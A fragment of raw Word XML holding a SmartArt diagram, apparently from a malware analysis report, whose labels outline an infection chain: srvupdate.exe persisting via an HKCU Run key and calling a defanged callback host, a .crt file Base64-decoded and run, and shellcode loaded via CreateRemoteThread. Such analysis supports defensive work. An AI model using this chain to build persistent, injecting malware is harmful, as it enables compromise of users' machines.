Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/></Relationships>
</file>

<file path=word/_rels/numbering.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"></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CDC70A-D13A-4143-AE54-324F7A0EE539}"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10258744-440A-4C9B-8BC5-3F3EF92E8BF2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Decrypt / Install as HKCU </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Run Registry Key</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" type="parTrans" cxnId="{4BEF09EA-BE59-4FBF-8E1F-6498245101D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{517E5413-A508-4C54-8EF1-B8E794171C59}" type="sibTrans" cxnId="{4BEF09EA-BE59-4FBF-8E1F-6498245101D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E89463D-27F5-473E-AB8E-3BC66859B534}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>hxxps://demowarecallback.local</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" type="parTrans" cxnId="{24BACE77-55A1-431E-BA21-ECB79A05CCFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD587FA2-A505-46BE-B12A-CD476C14439C}" type="sibTrans" cxnId="{24BACE77-55A1-431E-BA21-ECB79A05CCFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>crt1.crt</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EEA8068E-626F-4FD0-8857-F565967EC278}" type="parTrans" cxnId="{19DF72AB-18C4-40F1-B102-2108C62F4922}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4822C0D4-1F8A-4DED-88CC-EEAD689BC6FC}" type="sibTrans" cxnId="{19DF72AB-18C4-40F1-B102-2108C62F4922}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Base64 decode and run</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" type="parTrans" cxnId="{D3245460-EC29-431F-8E1E-6E49A8C8DBC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7470480E-DE37-4842-BB1D-3C010D3DC721}" type="sibTrans" cxnId="{D3245460-EC29-431F-8E1E-6E49A8C8DBC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Load shellcode via CreateRemoteThread</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" type="parTrans" cxnId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7A3C98F-EFA1-4150-8C61-071028FDB6A5}" type="sibTrans" cxnId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>srvupdate.exe</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3522D0E-88B5-41B9-83A5-4F45E80ACC3E}" type="sibTrans" cxnId="{89B5A280-FB43-4A6A-8B42-6F923073D48E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C9A5E8B-F030-46B6-9257-AE2D695BABE8}" type="parTrans" cxnId="{89B5A280-FB43-4A6A-8B42-6F923073D48E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" type="pres">
      <dgm:prSet presAssocID="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7725A94-E1DA-4F39-93A7-FDD965858616}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="root" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B369C25D-8E0D-4F88-ABDE-6DF39D006121}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="rootText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F814D6A9-FE86-4E60-B88F-F892FC0CDDFB}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="rootConnector" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="childShape" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11906579-E254-4F53-A5D7-645CFEDAB012}" type="pres">
      <dgm:prSet presAssocID="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C736118-38E2-44B6-B438-9AB467A9FC33}" type="pres">
      <dgm:prSet presAssocID="{10258744-440A-4C9B-8BC5-3F3EF92E8BF2}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}" type="pres">
      <dgm:prSet presAssocID="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{81CDCCEE-6D47-4AF9-97AF-D303A141EC73}" type="pres">
      <dgm:prSet presAssocID="{7E89463D-27F5-473E-AB8E-3BC66859B534}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="root" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C70499B9-9E13-4666-9509-800D713B9607}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootConnector" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B261433-48B5-45E1-8302-2E3844F6256B}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="childShape" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}" type="pres">
      <dgm:prSet presAssocID="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05B560B7-D20C-4F28-970C-4812B9C591F3}" type="pres">
      <dgm:prSet presAssocID="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" type="pres">
      <dgm:prSet presAssocID="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB74F4A0-6667-4351-9A85-AA0C7736449F}" type="pres">
      <dgm:prSet presAssocID="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1DE6E40E-2CE9-4D1E-95DA-5D060D3690DE}" type="presOf" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{B369C25D-8E0D-4F88-ABDE-6DF39D006121}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7DB9BA29-4570-45A8-96D5-43BE8E2CD1F3}" type="presOf" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{F814D6A9-FE86-4E60-B88F-F892FC0CDDFB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7252AC3D-7BA7-4D5C-9B48-603619823067}" type="presOf" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{6734575C-FF2F-4EDA-8C70-D616925C74F3}" type="presOf" srcId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" destId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{D3245460-EC29-431F-8E1E-6E49A8C8DBC8}" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003}" srcOrd="0" destOrd="0" parTransId="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" sibTransId="{7470480E-DE37-4842-BB1D-3C010D3DC721}"/>
    <dgm:cxn modelId="{0FBAE84D-2204-40C4-833B-99FD5A06F912}" type="presOf" srcId="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003}" destId="{05B560B7-D20C-4F28-970C-4812B9C591F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{24BACE77-55A1-431E-BA21-ECB79A05CCFA}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{7E89463D-27F5-473E-AB8E-3BC66859B534}" srcOrd="1" destOrd="0" parTransId="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" sibTransId="{BD587FA2-A505-46BE-B12A-CD476C14439C}"/>
    <dgm:cxn modelId="{89B5A280-FB43-4A6A-8B42-6F923073D48E}" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" srcOrd="0" destOrd="0" parTransId="{5C9A5E8B-F030-46B6-9257-AE2D695BABE8}" sibTransId="{B3522D0E-88B5-41B9-83A5-4F45E80ACC3E}"/>
    <dgm:cxn modelId="{AB6B038A-C161-4AE7-A181-C42F6CCEC477}" type="presOf" srcId="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" destId="{11906579-E254-4F53-A5D7-645CFEDAB012}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{9F34CB97-84CD-4B87-A3DD-B0EB33316F9F}" type="presOf" srcId="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" destId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{19DF72AB-18C4-40F1-B102-2108C62F4922}" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" srcOrd="1" destOrd="0" parTransId="{EEA8068E-626F-4FD0-8857-F565967EC278}" sibTransId="{4822C0D4-1F8A-4DED-88CC-EEAD689BC6FC}"/>
    <dgm:cxn modelId="{0246AAAD-3512-494E-80A9-D6C022C3E98B}" type="presOf" srcId="{7E89463D-27F5-473E-AB8E-3BC66859B534}" destId="{81CDCCEE-6D47-4AF9-97AF-D303A141EC73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{553FF6B9-0410-4271-837C-DC2C6C2433B8}" type="presOf" srcId="{10258744-440A-4C9B-8BC5-3F3EF92E8BF2}" destId="{1C736118-38E2-44B6-B438-9AB467A9FC33}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{8047C2BF-74FC-45C9-8BED-6CC3D6294FBF}" type="presOf" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{078DBDCA-7778-433B-9154-B17AA9A73C65}" type="presOf" srcId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" destId="{BB74F4A0-6667-4351-9A85-AA0C7736449F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{D1889AE2-DB58-437E-9B66-D435FB666EB3}" type="presOf" srcId="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" destId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" srcOrd="1" destOrd="0" parTransId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" sibTransId="{E7A3C98F-EFA1-4150-8C61-071028FDB6A5}"/>
    <dgm:cxn modelId="{4BEF09EA-BE59-4FBF-8E1F-6498245101D8}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{10258744-440A-4C9B-8BC5-3F3EF92E8BF2}" srcOrd="0" destOrd="0" parTransId="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" sibTransId="{517E5413-A508-4C54-8EF1-B8E794171C59}"/>
    <dgm:cxn modelId="{005ACAEC-2321-4E74-8CF0-8F1AFCA87FBB}" type="presOf" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{C70499B9-9E13-4666-9509-800D713B9607}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{33EA6AEF-28E8-4E01-A953-813E8978679B}" type="presParOf" srcId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" destId="{E7725A94-E1DA-4F39-93A7-FDD965858616}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{58AD8839-285C-4F83-9AF4-2790F9F4DE31}" type="presParOf" srcId="{E7725A94-E1DA-4F39-93A7-FDD965858616}" destId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{A98E5DF1-C8DA-4F34-B35D-8AEA58040CAE}" type="presParOf" srcId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" destId="{B369C25D-8E0D-4F88-ABDE-6DF39D006121}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{3C331EDB-70BA-4E4B-93ED-E1B622F56FB7}" type="presParOf" srcId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" destId="{F814D6A9-FE86-4E60-B88F-F892FC0CDDFB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{A5E69DDF-2F4B-4311-8985-D89931ECECAD}" type="presParOf" srcId="{E7725A94-E1DA-4F39-93A7-FDD965858616}" destId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{ADC5EE76-412B-44C6-9B9D-C3793B3FD3D4}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{11906579-E254-4F53-A5D7-645CFEDAB012}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{31ABEBB1-F8A3-4004-9294-C8960A3D4A86}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{1C736118-38E2-44B6-B438-9AB467A9FC33}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{8C9C77E0-E6C4-4E56-95D8-CE5228AF8A43}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{45461A3F-A12D-4329-92B3-0B4B20E2AFC2}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{81CDCCEE-6D47-4AF9-97AF-D303A141EC73}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{589BE807-98ED-47C7-9094-F65024B050D6}" type="presParOf" srcId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" destId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{83BFA9E1-4FA1-4082-AFBF-1B1B8A3AA80A}" type="presParOf" srcId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" destId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{37ABD5F9-3970-46C0-985E-AE9C9ED310D8}" type="presParOf" srcId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" destId="{C70499B9-9E13-4666-9509-800D713B9607}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{DD6D6D96-23D3-4685-A7C0-F844A832F7F9}" type="presParOf" srcId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" destId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7AF42180-C119-488D-B438-CCE084D9ED00}" type="presParOf" srcId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" destId="{3B261433-48B5-45E1-8302-2E3844F6256B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{74E51A8A-4C04-46DD-880A-31D5EE384FB5}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{2F095FD3-3639-4DAB-A9F0-39C2AF6765D7}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{05B560B7-D20C-4F28-970C-4812B9C591F3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{E0B7FF04-F459-4B80-9874-D8684A1AADF9}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{2B9207E1-539D-40F7-AD18-72E04F105C3F}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{BB74F4A0-6667-4351-9A85-AA0C7736449F}" srcOrd="3"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69C25D-8E0D-4F88-ABDE-6DF39D006121}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="794" y="368423"/>
          <a:ext cx="2890378" cy="14451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38100" rIns="57150" bIns="38100" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1333500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3000" kern="1200">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>srvupdate.exe</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="43122" y="410751"/>
        <a:ext cx="2805722" cy="1360533"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11906579-E254-4F53-A5D7-645CFEDAB012}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="289831" y="1813613"/>
          <a:ext cx="289037" cy="1083891"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="1083891"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="289037" y="1083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36118-38E2-44B6-B438-9AB467A9FC33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
